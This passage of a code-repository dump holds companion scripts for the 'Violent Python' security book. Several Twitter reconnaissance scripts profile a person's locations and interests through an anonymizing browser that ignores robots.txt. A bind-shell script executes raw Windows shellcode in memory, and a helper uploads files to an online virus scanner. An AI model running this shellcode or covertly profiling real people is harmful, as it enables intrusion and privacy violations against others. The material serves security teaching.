57 | return locations 58 | 59 | 60 | def main(): 61 | 62 | parser = optparse.OptionParser('usage %prog '+\ 63 | '-u <handle> [-c <city file>]') 64 | 65 | parser.add_option('-u', dest='handle', type='string',\ 66 | help='specify twitter handle') 67 | parser.add_option('-c', dest='cityFile', type='string',\ 68 | help='specify file containing cities to search') 69 | 70 | (options, args) = parser.parse_args() 71 | handle = options.handle 72 | cityFile = options.cityFile 73 | 74 | if (handle==None): 75 | print parser.usage 76 | exit(0) 77 | 78 | cities = [] 79 | if (cityFile!=None): 80 | cities = load_cities(cityFile) 81 | tweets = get_tweets(handle) 82 | locations = twitter_locate(tweets,cities) 83 | print "[+] Locations: "+str(locations) 84 | 85 | if __name__ == '__main__': 86 | main() 87 | 88 | 89 | -------------------------------------------------------------------------------- /CH6/9-twitterInterests.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import json 5 | import re 6 | import urllib 7 | import urllib2 8 | import optparse 9 | from anonBrowser import * 10 | 11 | 12 | def get_tweets(handle): 13 | query = urllib.quote_plus('from:' + handle+\ 14 | ' since:2009-01-01 include:retweets') 15 | tweets = [] 16 | browser = anonBrowser() 17 | browser.anonymize() 18 | 19 | response = browser.open('http://search.twitter.com/'+\ 20 | 'search.json?q=' + query) 21 | 22 | json_objects = json.load(response) 23 | for result in json_objects['results']: 24 | new_result = {} 25 | new_result['from_user'] = result['from_user_name'] 26 | new_result['geo'] = result['geo'] 27 | new_result['tweet'] = result['text'] 28 | tweets.append(new_result) 29 | return tweets 30 | 31 | 32 | def find_interests(tweets): 33 | interests = {} 34 | interests['links'] = [] 35 | interests['users'] = [] 36 | interests['hashtags'] = [] 37 | 38 | for tweet in tweets: 39 | text = tweet['tweet'] 40 | links = re.compile('(http.*?)\Z|(http.*?) ')\ 41 | .findall(text) 42 | 43 | for link in links: 44 | if link[0]: 45 | link = link[0] 46 | elif link[1]: 47 | link = link[1] 48 | else: 49 | continue 50 | 51 | try: 52 | response = urllib2.urlopen(link) 53 | full_link = response.url 54 | interests['links'].append(full_link) 55 | except: 56 | pass 57 | interests['users'] += re.compile('(@\w+)').findall(text) 58 | interests['hashtags'] +=\ 59 | re.compile('(#\w+)').findall(text) 60 | 61 | interests['users'].sort() 62 | interests['hashtags'].sort() 63 | interests['links'].sort() 64 | 65 | return interests 66 | 67 | 68 | def main(): 69 | 70 | parser = optparse.OptionParser('usage %prog '+\ 71 | '-u <handle>') 72 | 73 | parser.add_option('-u', dest='handle', type='string',\ 74 | help='specify twitter handle') 75 | 76 | (options, args) = parser.parse_args() 77 | handle = options.handle 78 | if handle == None: 79 | print parser.usage 80 | exit(0) 81 | 82 | tweets = get_tweets(handle) 83 | interests = find_interests(tweets) 84 | print '\n[+] Links.' 85 | for link in set(interests['links']): 86 | print ' [+] ' + str(link) 87 | 88 | print '\n[+] Users.' 89 | for user in set(interests['users']): 90 | print ' [+] ' + str(user) 91 | 92 | print '\n[+] HashTags.' 
93 | for hashtag in set(interests['hashtags']): 94 | print ' [+] ' + str(hashtag) 95 | 96 | 97 | if __name__ == '__main__': 98 | main() 99 | 100 | -------------------------------------------------------------------------------- /CH6/9-twitterRecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import json 4 | import urllib 5 | from anonBrowser import * 6 | 7 | class reconPerson: 8 | 9 | def __init__(self,first_name,last_name,\ 10 | job='',social_media={}): 11 | self.first_name = first_name 12 | self.last_name = last_name 13 | self.job = job 14 | self.social_media = social_media 15 | 16 | def __repr__(self): 17 | return self.first_name + ' ' +\ 18 | self.last_name + ' has job ' + self.job 19 | 20 | def get_social(self, media_name): 21 | if self.social_media.has_key(media_name): 22 | return self.social_media[media_name] 23 | 24 | return None 25 | 26 | def query_twitter(self, query): 27 | query = urllib.quote_plus(query) 28 | results = [] 29 | browser = anonBrowser() 30 | response = browser.open(\ 31 | 'http://search.twitter.com/search.json?q='+ query) 32 | json_objects = json.load(response) 33 | for result in json_objects['results']: 34 | new_result = {} 35 | new_result['from_user'] = result['from_user_name'] 36 | new_result['geo'] = result['geo'] 37 | new_result['tweet'] = result['text'] 38 | results.append(new_result) 39 | 40 | return results 41 | 42 | 43 | ap = reconPerson('Boondock', 'Saint') 44 | print ap.query_twitter(\ 45 | 'from:th3j35t3r since:2010-01-01 include:retweets') 46 | 47 | -------------------------------------------------------------------------------- /CH6/anonBrowser.py: -------------------------------------------------------------------------------- 1 | import mechanize, cookielib, random, time 2 | 3 | class anonBrowser(mechanize.Browser): 4 | 5 | def __init__(self, proxies = [], user_agents = []): 6 | mechanize.Browser.__init__(self) 7 | self.set_handle_robots(False) 8 | self.proxies = proxies 9 | self.user_agents = user_agents + ['Mozilla/4.0 ',\ 10 | 'FireFox/6.01','ExactSearch', 'Nokia7110/1.0'] 11 | 12 | self.cookie_jar = cookielib.LWPCookieJar() 13 | self.set_cookiejar(self.cookie_jar) 14 | self.anonymize() 15 | 16 | def clear_cookies(self): 17 | self.cookie_jar = cookielib.LWPCookieJar() 18 | self.set_cookiejar(self.cookie_jar) 19 | 20 | def change_user_agent(self): 21 | index = random.randrange(0, len(self.user_agents) ) 22 | self.addheaders = [('User-agent', \ 23 | ( self.user_agents[index] ))] 24 | 25 | def change_proxy(self): 26 | if self.proxies: 27 | index = random.randrange(0, len(self.proxies)) 28 | self.set_proxies( {'http': self.proxies[index]} ) 29 | 30 | def anonymize(self, sleep = False): 31 | self.clear_cookies() 32 | self.change_user_agent() 33 | self.change_proxy() 34 | 35 | if sleep: 36 | time.sleep(60) 37 | 38 | -------------------------------------------------------------------------------- /CH6/anonBrowser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/anonBrowser.pyc -------------------------------------------------------------------------------- /CH6/mlb-cities.txt: -------------------------------------------------------------------------------- 1 | baltimore 2 | boston 3 | chicago 4 | cleveland 5 | detroit 6 | kansas city 7 | los angeles 8 | minnesota 9 | new york 10 | oakland 11 | seattle 12 | 
tampa 13 | arlington 14 | toronto 15 | phoenix 16 | atlanta 17 | chicago 18 | cincinnati 19 | denver 20 | houston 21 | miami 22 | milwaukee 23 | philadelphia 24 | pittsburgh 25 | san diego 26 | san francisco 27 | st louis 28 | washington 29 | -------------------------------------------------------------------------------- /CH6/twitterClass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import urllib 4 | from anonBrowser import * 5 | import json 6 | import re 7 | import urllib2 8 | 9 | 10 | class reconPerson: 11 | 12 | def __init__(self, handle): 13 | self.handle = handle 14 | self.tweets = self.get_tweets() 15 | 16 | def get_tweets(self): 17 | query = urllib.quote_plus('from:' + self.handle+\ 18 | ' since:2009-01-01 include:retweets' 19 | ) 20 | tweets = [] 21 | browser = anonBrowser() 22 | browser.anonymize() 23 | response = browser.open('http://search.twitter.com/'+\ 24 | 'search.json?q=' + query) 25 | 26 | json_objects = json.load(response) 27 | for result in json_objects['results']: 28 | new_result = {} 29 | new_result['from_user'] = result['from_user_name'] 30 | new_result['geo'] = result['geo'] 31 | new_result['tweet'] = result['text'] 32 | tweets.append(new_result) 33 | return tweets 34 | 35 | def find_interests(self): 36 | interests = {} 37 | interests['links'] = [] 38 | interests['users'] = [] 39 | interests['hashtags'] = [] 40 | 41 | for tweet in self.tweets: 42 | text = tweet['tweet'] 43 | links = re.compile('(http.*?)\Z|(http.*?) ').findall(text) 44 | 45 | for link in links: 46 | if link[0]: 47 | link = link[0] 48 | elif link[1]: 49 | link = link[1] 50 | else: 51 | continue 52 | 53 | try: 54 | response = urllib2.urlopen(link) 55 | full_link = response.url 56 | interests['links'].append(full_link) 57 | except: 58 | pass 59 | interests['users'] +=\ 60 | re.compile('(@\w+)').findall(text) 61 | interests['hashtags'] +=\ 62 | re.compile('(#\w+)').findall(text) 63 | 64 | interests['users'].sort() 65 | interests['hashtags'].sort() 66 | interests['links'].sort() 67 | return interests 68 | 69 | def twitter_locate(self, cityFile): 70 | cities = [] 71 | if cityFile != None: 72 | for line in open(cityFile).readlines(): 73 | city = line.strip('\n').strip('\r').lower() 74 | cities.append(city) 75 | 76 | locations = [] 77 | locCnt = 0 78 | cityCnt = 0 79 | tweetsText = '' 80 | 81 | for tweet in self.tweets: 82 | if tweet['geo'] != None: 83 | locations.append(tweet['geo']) 84 | locCnt += 1 85 | 86 | tweetsText += tweet['tweet'].lower() 87 | 88 | for city in cities: 89 | if city in tweetsText: 90 | locations.append(city) 91 | cityCnt += 1 92 | 93 | return locations 94 | 95 | 96 | -------------------------------------------------------------------------------- /CH7/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH7/.DS_Store -------------------------------------------------------------------------------- /CH7/1-bindshell.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | 3 | shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" 4 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 5 | "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" 6 | "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" 7 | 
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" 8 | "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" 9 | "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" 10 | "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" 11 | "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" 12 | "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" 13 | "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" 14 | "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" 15 | "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" 16 | "\x31\xdb\x53\x68\x02\x00\x05\x39\x89\xe6\x6a\x10\x56\x57\x68" 17 | "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" 18 | "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" 19 | "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" 20 | "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" 21 | "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" 22 | "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" 23 | "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56" 24 | "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" 25 | "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"); 26 | 27 | memorywithshell = create_string_buffer(shellcode, len(shellcode)) 28 | shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) 29 | shell() 30 | 31 | -------------------------------------------------------------------------------- /CH7/2-virusCheck.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import re 4 | import httplib 5 | import time 6 | import os 7 | import optparse 8 | from urlparse import urlparse 9 | 10 | 11 | def printResults(url): 12 | 13 | status = 200 14 | host = urlparse(url)[1] 15 | path = urlparse(url)[2] 16 | 17 | if 'analysis' not in path: 18 | while status != 302: 19 | conn = httplib.HTTPConnection(host) 20 | conn.request('GET', path) 21 | resp = conn.getresponse() 22 | status = resp.status 23 | print '[+] Scanning file...' 24 | conn.close() 25 | time.sleep(15) 26 | 27 | print '[+] Scan Complete.' 28 | path = path.replace('file', 'analysis') 29 | conn = httplib.HTTPConnection(host) 30 | conn.request('GET', path) 31 | resp = conn.getresponse() 32 | data = resp.read() 33 | conn.close() 34 | 35 | reResults = re.findall(r'Detection rate:.*\)', data) 36 | htmlStripRes = reResults[1].\ 37 | replace('<font color=\'red\'>', '').\ 38 | replace('</font>', '') 39 | print '[+] ' + str(htmlStripRes) 40 | 41 | 42 | def uploadFile(fileName): 43 | 44 | print "[+] Uploading file to NoVirusThanks..." 
45 | fileContents = open(fileName,'rb').read() 46 | 47 | header = {'Content-Type': 'multipart/form-data; \ 48 | boundary=----WebKitFormBoundaryF17rwCZdGuPNPT9U'} 49 | 50 | params = "------WebKitFormBoundaryF17rwCZdGuPNPT9U" 51 | params += "\r\nContent-Disposition: form-data; "+\ 52 | "name=\"upfile\"; filename=\""+str(fileName)+"\"" 53 | params += "\r\nContent-Type: "+\ 54 | "application/octet-stream\r\n\r\n" 55 | params += fileContents 56 | params += "\r\n------WebKitFormBoundaryF17rwCZdGuPNPT9U" 57 | params += "\r\nContent-Disposition: form-data; "+\ 58 | "name=\"submitfile\"\r\n" 59 | params += "\r\nSubmit File\r\n" 60 | params +="------WebKitFormBoundaryF17rwCZdGuPNPT9U--\r\n" 61 | conn = httplib.HTTPConnection('vscan.novirusthanks.org') 62 | conn.request("POST", "/", params, header) 63 | response = conn.getresponse() 64 | location = response.getheader('location') 65 | conn.close() 66 | return location 67 | 68 | 69 | def main(): 70 | 71 | parser = optparse.OptionParser('usage %prog -f <filename>') 72 | parser.add_option('-f', dest='fileName', type='string',\ 73 | help='specify filename') 74 | (options, args) = parser.parse_args() 75 | fileName = options.fileName 76 | 77 | if fileName == None: 78 | print parser.usage 79 | exit(0) 80 | elif os.path.isfile(fileName) == False: 81 | print '[+] ' + fileName + ' does not exist.' 82 | exit(0) 83 | else: 84 | loc = uploadFile(fileName) 85 | printResults(loc) 86 | 87 | 88 | if __name__ == '__main__': 89 | main() 90 | 91 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Violent Python scripts 2 | 3 | Some of the scripts are updated for Python 3 support 4 | 5 | The rest will be done soon. 6 | -------------------------------------------------------------------------------- /Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers.pdf --------------------------------------------------------------------------------
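As a closing illustration of the kind of Python 3 updates the README mentions, here is a minimal, hypothetical port of CH6/8-googleJson.py to the Python 3 standard library. The Google AJAX search endpoint has long been retired, so the URL is kept only to mirror the original script; the sketch shows the mechanical changes a port involves, not a working search client:

    #!/usr/bin/python3
    # -*- coding: utf-8 -*-
    import json
    import urllib.parse
    import urllib.request


    def google(search_term):
        #urllib.quote_plus moved to urllib.parse.quote_plus in Python 3
        search_term = urllib.parse.quote_plus(search_term)
        url = ('http://ajax.googleapis.com/'
               'ajax/services/search/web?v=1.0&q=' + search_term)
        #urllib2.urlopen became urllib.request.urlopen; the body is bytes
        with urllib.request.urlopen(url) as response:
            objects = json.loads(response.read().decode('utf-8'))
        #print is a function, not a statement, in Python 3
        print(objects)


    google('Boondock Saint')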